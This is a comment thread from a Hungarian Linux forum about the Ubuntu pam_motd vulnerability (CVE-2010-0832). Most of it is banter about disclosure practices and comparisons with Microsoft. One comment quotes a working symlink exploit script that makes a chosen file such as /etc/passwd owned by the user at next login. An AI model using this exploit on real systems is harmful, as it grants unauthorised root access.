- A hozzászóláshoz be kell jelentkezni
- 3476 megtekintés
Hozzászólások
Érdekes kontraszt ez az MS reagálása után ;)
### ()__))____________)~~~ ################
#"Ha én veletek, ki ellenetek?"#1000H/UbuFb
- A hozzászóláshoz be kell jelentkezni
Engem az érdekelne, hogy a hibáról mióta tudnak, miért nem adtak ki security advisoryt amikor tudomást szereztek a hibáról, illetve mi lett volna a reakciójuk, ha a hibát nyilvánosságra hozták volna, mielőtt elkészül a javítás.
--
Don't be an Ubuntard!
- A hozzászóláshoz be kell jelentkezni
Engem sokkal jobban rémiszt a "többi disztibúció nem érintett". Mit nyúlkálnak már megint bele. Kezdődik a SuSe féle én jobban tudom, mint mindenki más, oszt használhatatlan vacak lesz belőle (SuSe 9). :)
- A hozzászóláshoz be kell jelentkezni
Megpatchelték a pam_motd-t, mint az MS az openssl-t... oh wait! ;)
- A hozzászóláshoz be kell jelentkezni
Nee! Megelőzted szegény Gabucinot az openssl-ezéssel.
Miért vagy ilyen aljas? :D
-------------------------------------------
Dell Vostro 1015 // Ubuntu 10.04 //
- A hozzászóláshoz be kell jelentkezni
Most végre kiderült, hogy Hunger csak Magdika másik nickje ;)
- A hozzászóláshoz be kell jelentkezni
Ugyan, lehet, hogy mas ezeknek az infoknak a birtokaban van, elvegre kontrasztot lat.
- A hozzászóláshoz be kell jelentkezni
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0832
Ez alatt most mit kell érteni? Március 3 óta van bug?
### ()__))____________)~~~ ################
#"Ha én veletek, ki ellenetek?"#1000H/UbuFb
- A hozzászóláshoz be kell jelentkezni
Persze, az Ubuntu 9.10 meg időutazással érintett...
- A hozzászóláshoz be kell jelentkezni
Mármint, hogy azóta ismert?
### ()__))____________)~~~ ################
#"Ha én veletek, ki ellenetek?"#1000H/UbuFb
- A hozzászóláshoz be kell jelentkezni
Nem, akkor kapott CVE azonosítót, már korábban ismert volt.
- A hozzászóláshoz be kell jelentkezni
OK ok. csak felmerült, hogy nem tudjuk mióta ismert... gondoltam próbálok valamiből következtetni... és akkor ezek szerint elmondhatjuk, hogy a CVE kiadásának pillanatában (Márc 03) Már ismert volt. Tehát a minimális gap a megtalálás és a javítás között 4 hónap.
### ()__))____________)~~~ ################
#"Ha én veletek, ki ellenetek?"#1000H/UbuFb
- A hozzászóláshoz be kell jelentkezni
és nagy a kontraszt az MS kapcsán felmerült 4 nap utáni műsorhoz képest? ;)
- A hozzászóláshoz be kell jelentkezni
ahhahah
- A hozzászóláshoz be kell jelentkezni
Gondolom igen... De őszintén nem hiszem, hogy az ubinál bárki picsogott volna ha publikálják a hibát... sőt szerintem akkor gyorsabban is javították volna.
Az MS reakciója nekem nem ott problémás, hogy több idő kell a javításhoz, meg ilyenek, hanem ott hogy picsognak.
### ()__))____________)~~~ ################
#"Ha én veletek, ki ellenetek?"#1000H/UbuFb
- A hozzászóláshoz be kell jelentkezni
Persze-persze, a Pwnie-díjas Linus "security circus" Torvalds úr meg csak véletlenül kapta a "kitüntetését".
- A hozzászóláshoz be kell jelentkezni
Mindenesetre még nem alakult meg az Ubuntu-Spurned Researcher Collective, illetve a Linux-Spurned Researcher Collective. Tehát valamiféle eltérés azért egyelőre csak van... ;>
--
trey @ gépház
- A hozzászóláshoz be kell jelentkezni
Dehogynem, nem kevés ilyen oldal van, csak ezek nem kerülnek be a huphírekbe, ki tudja miért ;)
[ "Security people are leaches!" - Linus T. ] [ hupexpertize© || hupdiploma ]
- A hozzászóláshoz be kell jelentkezni
Szívesen fogadok linkeket ilyen oldalakra.
"csak ezek nem kerülnek be a huphírekbe, ki tudja miért "
Csak elmondod majd a rögeszmédet. Illetve csak megmagyarázod, hogy itthon miért lehet ezen az oldalon az elmúlt 10 évre visszamenőleg szinte minden linuxos sebezhetőségről olvasni.
--
trey @ gépház
- A hozzászóláshoz be kell jelentkezni
Lehet nem olvastad a szálat: nem sebezhetőségekről volt szó, hanem az ilyen-olyan spurned hülyegyerekek jerk-off attention-whore kollektíváiról, elnézést, M$-killer szuperhősökről, illetve ezek binuzos ellenpárjairól.
[ "Security people are leaches!" - Linus T. ] [ hupexpertize© || hupdiploma ]
- A hozzászóláshoz be kell jelentkezni
Ja, sok szálat futtatok jelenleg. Esetleg a ilyen-olyan spurned hülyegyerekek jerk-off attention-whore kollektíváiról, elnézést, Linux-killer szuperhősökről a linkek? Tényleg érdekelne, bookmarkolnám.
--
trey @ gépház
- A hozzászóláshoz be kell jelentkezni
Az első tagmondatra egyértelműen a hup.hu ugrik be, ezt lehet ismered. A másodikra adok linket, majd ha vettem a fáradtságot az nginx elindítására, addigis ajánlanám a gplhuszar.com-ot, de már nem megy ;) Marad a http://linuxhaters.blogspot.com/, már az első három posztban több érdekes, hasznos és olvasmányos infót találtam, mint a hupon mondjuk az elmúlt két hónap alatt :) Nem kritika, ide másért járunk.
[ "Security people are leaches!" - Linus T. ] [ hupexpertize© || hupdiploma ]
- A hozzászóláshoz be kell jelentkezni
Hát ez elég soványka lett. Remélem érzed ezt te is ;)
--
trey @ gépház
- A hozzászóláshoz be kell jelentkezni
Arról volt szó hogy szórakozunk, meg plusz tizenkettő, elfelejtetted volna? :)
[ "Security people are leaches!" - Linus T. ] [ hupexpertize© || hupdiploma ]
- A hozzászóláshoz be kell jelentkezni
Sajnos azt vettem észre, hogy a produktivitásom rovására megy ez a sok fecsegés. Fájlalom, hogy nincs már annyi idő ezekre a flame szálakra mint régen. Sajnos akadnak ennél fontosabb dolgaim is, de azért néha még benézek majd ;)
--
trey @ gépház
- A hozzászóláshoz be kell jelentkezni
Csocsi! o/
- A hozzászóláshoz be kell jelentkezni
> http://linuxhaters.blogspot.com/,
ROFL, ez mi? :D Ballmer blogja? :D
- A hozzászóláshoz be kell jelentkezni
Szerintem ez annak készült, de sajnos nem volt a "fiúkban" elég kitartás, és pár cikk után befulladt! Mellesleg szomorúan látom, hogy a gabucino.be is halott ...
- A hozzászóláshoz be kell jelentkezni
gabucino be is halt :-P
--
nincs aláírásom
- A hozzászóláshoz be kell jelentkezni
jajj ez a cannibal annyira cuki, még energiát is feccölt bele :)
- A hozzászóláshoz be kell jelentkezni
Valóban nagy a kontraszt, mert ilyen béna, symlinkeléssel root szerzésre alkalmas hibák a '90-es évekre voltak jellemzők.
- A hozzászóláshoz be kell jelentkezni
Legyen... akkoriban még nem Linuxoztam. Szóval jól elhiszem. És közben reménykedem hogy most már abbahagyják az ubinál az új elemek behelyezését, és fordítanak időt az összecsiszolásra.
### ()__))____________)~~~ ################
#"Ha én veletek, ki ellenetek?"#1000H/UbuFb
- A hozzászóláshoz be kell jelentkezni
Milyen egyszerű.
if [ $# -eq 0 ]; then
echo "Usage: $0 /path/to/file"
exit 1
fi
mkdir $HOME/backup 2> /dev/null
tmpdir=$(mktemp -d --tmpdir=$HOME/backup/)
mv $HOME/.cache/ $tmpdir 2> /dev/null
echo "\n@@@ File before tampering ...\n"
ls -l $1
ln -sf $1 $HOME/.cache
echo "\n@@@ Now log back into your shell (or re-ssh) to make PAM call vulnerable MOTD code :) File will then be owned by your user. Try /etc/passwd...\n"
- A hozzászóláshoz be kell jelentkezni
Nem vagyok up-to-date, de a motd megjelenitesehez mi a francnak pam modul????
- A hozzászóláshoz be kell jelentkezni
.
- A hozzászóláshoz be kell jelentkezni
Hát mert így moduláris! Moduláris = jó! Értem?!
[ "Security people are leaches!" - Linus T. ] [ hupexpertize© || hupdiploma ]
- A hozzászóláshoz be kell jelentkezni
így motdern
- A hozzászóláshoz be kell jelentkezni
"Az ubuntu biztonságos"
Jajj. büfiztem :)
- A hozzászóláshoz be kell jelentkezni